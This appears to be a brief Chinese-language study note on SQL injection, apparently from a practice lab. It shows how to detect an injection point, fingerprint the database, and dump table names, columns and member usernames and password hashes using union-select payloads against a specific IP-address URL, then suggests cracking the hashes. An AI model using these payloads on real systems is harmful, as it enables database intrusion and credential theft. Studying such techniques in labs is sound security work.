一般的sql注入思路:
看是否有注入点的方式1. and 1=1 正确;and 1=2 错误(原因:逻辑运算的判断)方式2.随便输入一串字符看是否报错,如果报错或者跳转说明有检测大部分没漏洞。
数据库版本(version()) 5.7.22-0ubuntu0.16.04.1
数据库(database()) mozhe_Discuz_StormGroup
操作系统(@@version_compile_os) Linux
用户(user()) root@localhost
查询大表中http://124.70.22.208:45848/new_list.php?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'
表名 StormGroup_member,notice
列名表查询http://124.70.22.208:45848/new_list.php?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'
列id,name,password,status
数据查询http://124.70.22.208:45848/new_list.php?id=-1 union select 1,name,password,4 from StormGroup_member
获得登录账户和密码使用cmd5解密
多个数据拆解limit x,1 变动拆解